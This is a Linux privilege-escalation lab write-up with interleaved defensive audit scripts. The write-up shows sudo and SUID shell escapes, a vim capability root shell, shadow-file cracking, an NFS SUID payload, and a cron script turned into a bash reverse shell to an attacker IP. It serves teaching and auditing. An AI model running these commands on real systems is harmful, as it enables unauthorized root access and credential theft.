
LineKernel


Last updated 9 months ago

Abdelrahman Ali Abdelaziz

Privilege escalation occurs when a computer user exploits system vulnerabilities or misconfigurations to gain access to other user accounts within a computer system. By obtaining access to these accounts, they can access additional files and execute administrative commands.

There are two types of privilege escalation:

1. Vertical privilege escalation.

2. Horizontal privilege escalation.

Enumeration

The hostname command will return the hostname of the target machine

hostname 
or
uname -n

To get the Linux kernel version, use uname -r:

uname -r 

Python version and distribution release:

python -V
cat /etc/issue

Initial Access

The kernel is the central program within a computer's operating system, holding full control over all aspects of the system. It is the part of the operating system that always remains in memory, enabling communication between hardware and software components. Typically written in a low-level language like C, the kernel is susceptible to binary exploitation techniques, which can be used to uncover vulnerabilities.

To find a privilege-escalation PoC for the kernel, get its exact version and search for it:

cat /proc/version
uname -a
searchsploit "Linux Kernel <version>"
# or search in Google: site:exploit-db.com "Linux kernel <version>"

OK, I will search for the vulnerable kernel version.

I found CVE-2015-1328

  • Ubuntu 14.04 - Linux ubuntu 3.13.0-24-generic #46-Ubuntu x86_64

gcc exploit.c -o exploit

PrivEsc

Programs the user can run with sudo

Running sudo -l lists all the binaries the user may run with sudo:

User karen may run the following commands on ip-10-10-202-96:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano
sudo less flag2.txt

To get Frank's password, use sudo less /etc/shadow.
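The listing above is exactly the kind of output a defender should be checking on every host: a NOPASSWD rule on a pager or an editor is a root shell waiting to happen. The following audit script is an added example (not part of the walkthrough): it parses `sudo -l` output and flags rules whose binary has a known shell escape. The sample output is constructed to mirror the listing above, and SHELL_ESCAPE_BINARIES is an illustrative, assumed list rather than a complete catalogue.

```python
# Added example (not from the walkthrough): parse `sudo -l` output and flag rules
# that hand out a root shell. The sample output is constructed to mirror the
# listing above; SHELL_ESCAPE_BINARIES is an illustrative, assumed list.
import os
import re

# Binaries with a documented sudo shell escape (GTFOBins catalogues them).
SHELL_ESCAPE_BINARIES = {"find", "less", "nano", "vim", "vi", "more", "man", "awk", "python3"}

# One rule line looks like "    (ALL) NOPASSWD: /usr/bin/find" or
# "    (root) /usr/bin/systemctl restart nginx" (tags are optional).
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_l(output):
    """Return a list of {'runas', 'tags', 'command'} dicts, one per command."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # headers such as "User karen may run ..." carry no rule
        tags = set(re.findall(r"[A-Z_]+", m.group("tags")))
        for cmd in m.group("cmd").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd})
    return rules

def risky_rules(rules):
    """Pair each dangerous rule with the reason it is dangerous."""
    findings = []
    for rule in rules:
        cmd = rule["command"]
        if cmd == "ALL":
            findings.append((cmd, "unrestricted sudo"))
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in SHELL_ESCAPE_BINARIES:
            reason = "shell escape"
            if "NOPASSWD" in rule["tags"]:
                reason += " without a password"
            findings.append((cmd, reason))
    return findings

# Constructed sample output, not captured from a real host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for karen on ip-10-10-202-96:
    env_reset, mail_badpass

User karen may run the following commands on ip-10-10-202-96:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano
    (root) /usr/bin/systemctl restart nginx
"""

def audit_sample():
    """Run the audit over the constructed sample and return its findings."""
    return risky_rules(parse_sudo_l(SAMPLE_SUDO_L))

if __name__ == "__main__":
    for cmd, reason in audit_sample():
        print(f"{cmd}: {reason}")
```

The systemctl rule is left alone because a fixed command line is the shape a sudoers entry should have; the fix for the three flagged rules is to replace them with narrowly scoped commands (or drop them) and to keep NOPASSWD for nothing that can spawn a shell.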

Privilege Escalation: SUID

We run the following command to list SUID binaries, then check whether any of them can lead to a privilege escalation:

find / -type f -perm -04000 -ls 2>/dev/null

I searched Google to find the privesc using base64:

base64 "$LFILE" | base64 --decode

unshadow

unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt

Limited capabilities

Remember: if the capabilities set on a binary can lead to a privilege escalation, we search for that flaw using getcap.

getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep

I searched Google to find the privesc using capabilities:

vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
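Both the SUID listing from the find command earlier and the getcap listing above are best read against a baseline: a setuid-root copy of base64 or a vim binary carrying cap_setuid in a home directory should stand out immediately. The script below is an added example, not part of the walkthrough: it parses `find -ls` output and `getcap -r` output and reports entries the baseline does not account for. Both listings are constructed, modelled on the output shown above, and the baseline sets are illustrative assumptions (a real one comes from a known-good image of the same build).

```python
# Added example (not from the walkthrough): audit the output of the two commands
# above, `find / -type f -perm -04000 -ls` and `getcap -r /`, against a baseline.
# Both listings below are constructed; the baseline sets are illustrative assumptions.
import re

# SUID binaries expected on a stock Ubuntu-style host (assumption).
SUID_BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/mount",
                 "/usr/bin/umount", "/usr/bin/su", "/usr/bin/newgrp", "/usr/bin/chsh"}
# Capabilities that amount to root when held by an arbitrary binary.
ROOT_EQUIVALENT_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
                        "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace",
                        "cap_sys_module", "cap_chown"}
# Capabilities the baseline grants to specific binaries (assumption).
CAP_BASELINE = {"/usr/bin/ping": {"cap_net_raw"}, "/usr/bin/mtr-packet": {"cap_net_raw"}}

def parse_find_ls(output):
    """Parse `find -ls` lines into (path, mode_string, owner) tuples."""
    entries = []
    for line in output.splitlines():
        parts = line.split()
        # fields: inode blocks perms links owner group size month day time path
        if len(parts) < 11:
            continue
        entries.append((" ".join(parts[10:]), parts[2], parts[4]))
    return entries

def unexpected_suid(entries):
    """SUID files outside the baseline; note those sitting in user-writable trees."""
    findings = []
    for path, mode, owner in entries:
        if mode[3].lower() != "s":  # 4th char is the owner-execute slot: 's'/'S' = setuid
            continue
        if path in SUID_BASELINE:
            continue
        reason = f"setuid {owner}, not in baseline"
        if path.startswith(("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")):
            reason += ", located in a user-writable tree"
        findings.append((path, reason))
    return findings

def parse_getcap(output):
    """Map path -> set of capability names; accepts both 'p = c+ep' and 'p c=ep' formats."""
    caps = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        caps[path] = set(re.findall(r"cap_[a-z_]+", rest))
    return caps

def unexpected_caps(caps):
    """Capabilities not granted by the baseline, marked when they are root-equivalent."""
    findings = []
    for path, names in sorted(caps.items()):
        extra = names - CAP_BASELINE.get(path, set())
        if extra:
            severity = "root-equivalent" if extra & ROOT_EQUIVALENT_CAPS else "review"
            findings.append((path, sorted(extra), severity))
    return findings

# Constructed listings, modelled on the output shown above.
SUID_LISTING = """\
   131119      8 -rwsr-xr-x   1 root     root         8344 Jan 31  2020 /usr/bin/mount
   131135    168 -rwsr-xr-x   1 root     root       166056 Jan 19  2021 /usr/bin/sudo
   131125     76 -rwsr-xr-x   1 root     root        68208 May 28  2020 /usr/bin/passwd
   263472     40 -rwsr-xr-x   1 root     root        39144 Sep  5  2019 /usr/bin/base64
   527891    100 -rwsr-sr-x   1 root     root       102352 Aug 12 10:03 /home/karen/helper
"""
GETCAP_LISTING = """\
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
/usr/sbin/arping cap_net_raw=ep
"""

def audit_sample():
    """Run both audits over the constructed listings."""
    return unexpected_suid(parse_find_ls(SUID_LISTING)), unexpected_caps(parse_getcap(GETCAP_LISTING))

if __name__ == "__main__":
    suid, caps = audit_sample()
    for path, reason in suid:
        print("SUID", path, reason)
    for path, names, severity in caps:
        print("CAP ", path, ",".join(names), severity)
```

Remediation for a hit is the inverse of the findings: `chmod u-s` on a binary that should never have been setuid, `setcap -r` on a stray capability, and a look at who put the file there, since a setuid or cap_setuid binary inside a home directory rarely gets there by accident.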

Privilege Escalation: Cron

Cron is the Linux job scheduler.

First, check the system crontab:

cat /etc/crontab

Check every file referenced there for anything you can modify.

We first check /karen/backup.sh. Since we have write permission on it, we modify it:

#!/bin/bash
bash -i >& /dev/tcp/10.21.32.157/4444 0>&1

chmod 777 backup.sh

# start the reverse-shell listener on the attacker machine
nc -nvlp 4444
unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt

Privilege Escalation: PATH

Find writable directories; a writable directory can be prepended to PATH so that a planted file is found before the real command:

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
export PATH=/tmp:$PATH
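The cron and PATH sections above are two faces of one misconfiguration: a file that root (or a privileged script) will execute, sitting somewhere a less privileged user can write. The check below is an added example, not part of the walkthrough, and covers both: it parses /etc/crontab-style lines and flags root jobs whose script is group- or world-writable, and it flags PATH entries that are writable directories or relative. The crontab text is constructed and the files are created in a temporary directory, so it runs without root on any Linux/Unix box.

```python
# Added example (not from the walkthrough): a root cron job whose script other
# users can edit and a writable directory on PATH both reduce to "is this path
# writable by someone other than its owner?". The crontab text is constructed
# and the files live in a temporary directory, so no root is needed to run it.
import os
import shutil
import stat
import tempfile

def writable_by_others(path):
    """True when the group or world write bit is set (the owner is trusted).
    A sticky bit does not clear this: it stops deleting other users' files,
    not planting new ones."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue  # blank, comment, or VAR=value assignment
        n = 1 if line.startswith("@") else 5  # '@reboot' or five schedule fields
        parts = line.split(None, n + 1)
        if len(parts) == n + 2:
            jobs.append((parts[n], parts[n + 1]))
    return jobs

def risky_cron_jobs(crontab_text):
    """Root jobs whose script file can be modified by group/others."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        target = command.split()[0]
        if user == "root" and target.startswith("/") and writable_by_others(target):
            findings.append((target, "root cron job, script writable by group/others"))
    return findings

def risky_path_dirs(path_value):
    """Entries of a PATH string that a local user could plant a binary in."""
    findings = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry or "(empty)", "relative entry, resolves to the current directory"))
        elif os.path.isdir(entry) and writable_by_others(entry):
            findings.append((entry, "writable directory on PATH"))
    return findings

def demo():
    """Constructed layout mirroring the walkthrough: a 777 backup.sh run by root
    from cron, and a world-writable directory placed first on PATH."""
    base = tempfile.mkdtemp()
    try:
        script = os.path.join(base, "backup.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\ntar czf /var/backups/home.tgz /home\n")
        os.chmod(script, 0o777)                  # the misconfiguration
        loose = os.path.join(base, "loose-bin")  # stands in for /tmp
        safe = os.path.join(base, "safe-bin")    # stands in for /usr/bin
        os.mkdir(loose)
        os.chmod(loose, 0o1777)
        os.mkdir(safe)
        os.chmod(safe, 0o755)
        crontab = (
            "SHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/bin\n"
            "# m h dom mon dow user command\n"
            f"*  *  *  *  * root {script}\n"
            "17 *  *  *  * root cd / && run-parts --report /etc/cron.hourly\n"
        )
        return risky_cron_jobs(crontab), risky_path_dirs(f"{loose}:{safe}:")
    finally:
        shutil.rmtree(base)

if __name__ == "__main__":
    cron, path = demo()
    for item in cron + path:
        print(*item)
```

On a real host you would feed it the contents of /etc/crontab and /etc/cron.d/* and the PATH values from root's environment and from the crontab's own PATH line. The run-parts job is deliberately not flagged: its command does not start with an absolute path, and chasing `cd` chains is out of scope for a first pass.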

Privilege Escalation: NFS

Exploiting the Network File Sharing Protocol

Network File Sharing (NFS) is a protocol that lets you share directories and files with other Linux clients over a network.

cat /etc/exports

Read the /etc/exports file. If you find a directory exported with no_root_squash, you can mount it as a client and write inside it as if you were the local root of the machine.

showmount -e <IP>

#Attacker, as root user
gcc -static payload.c -o /tmp/payload
mkdir /tmp/pe
mount -o rw <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /tmp/payload .
chmod +s payload

#Victim
cd <SHARED_FOLDER>
./payload
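The whole NFS path above hinges on one option in /etc/exports. The script below is an added example (not part of the walkthrough): it parses an exports file, flags no_root_squash, insecure and read-write exports to any host, and prints a hardened replacement line. The sample exports file is constructed.

```python
# Added example (not from the walkthrough): parse /etc/exports and flag the
# options that make a share dangerous, then emit a hardened line. The exports
# file below is constructed.
import re

# host(options) entries, e.g. "*(rw,no_root_squash)" or "10.0.0.0/24" with default options
CLIENT_RE = re.compile(r"(\S+?)(?:\(([^)]*)\))?(?=\s|$)")

RISKY_OPTIONS = {
    "no_root_squash": "client uid 0 is not mapped to nobody, so a SUID-root file "
                      "written from a client runs as root on the server",
    "insecure": "requests from unprivileged source ports are accepted, so any "
                "local user on a client can speak NFS without being root there",
}

def parse_exports(text):
    """Return (path, host, options-set) for every client entry in an exports file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) < 2:
            continue  # path with no client specification: nothing to evaluate
        path, rest = parts
        for m in CLIENT_RE.finditer(rest):
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, m.group(1), opts))
    return entries

def risky_exports(entries):
    """Client entries carrying a risky option or read-write access for everyone."""
    findings = []
    for path, host, opts in entries:
        problems = [opt for opt in ("no_root_squash", "insecure") if opt in opts]
        if host == "*" and "rw" in opts:
            problems.append("rw to any host")
        if problems:
            findings.append((path, host, problems))
    return findings

def hardened_line(path, host, opts):
    """Drop the risky options and state root_squash explicitly."""
    kept = (set(opts) - set(RISKY_OPTIONS)) | {"root_squash"}
    return f"{path} {host}({','.join(sorted(kept))})"

SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home/backup   *(rw,sync,no_root_squash,no_subtree_check)
/srv/public    10.0.0.0/24(ro,sync)  *(ro)
/srv/dev       192.168.1.5(rw,insecure)
"""

def audit_sample():
    """Run the audit over the constructed exports file."""
    return risky_exports(parse_exports(SAMPLE_EXPORTS))

if __name__ == "__main__":
    for path, host, problems in audit_sample():
        print(f"{path} -> {host}: {', '.join(problems)}")
        for p in problems:
            if p in RISKY_OPTIONS:
                print("    ", RISKY_OPTIONS[p])
    print(hardened_line("/home/backup", "*", {"rw", "sync", "no_root_squash", "no_subtree_check"}))
```

Restricting the host field to the clients that actually need the share is the other half of the fix; root_squash alone does not help if the export is read-write to every address on the network.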

Capstone Project

Enumeration

Find SUID binaries:

find / -type f -perm -04000 -ls 2>/dev/null

unshadow

su missy

Check sudo rights:

sudo -l

sudo find

sudo find . -exec /bin/sh \; -quit

Exploit Resources

  • linux-kernel-exploits/2015/CVE-2015-1328 at master · SecWiki/linux-kernel-exploits (GitHub)
  • GTFOBins

Other Resources

Mount that directory on a client machine, as root copy our compiled payload (which abuses the SUID permission) into the mounted folder, give it SUID rights, and execute that binary from the victim machine (some payloads are linked below).

  • C SUID payloads: Payloads to execute (HackTricks)
  • NFS no_root_squash/no_all_squash misconfiguration PE (HackTricks)
Hostname For wade
sudo less
Password1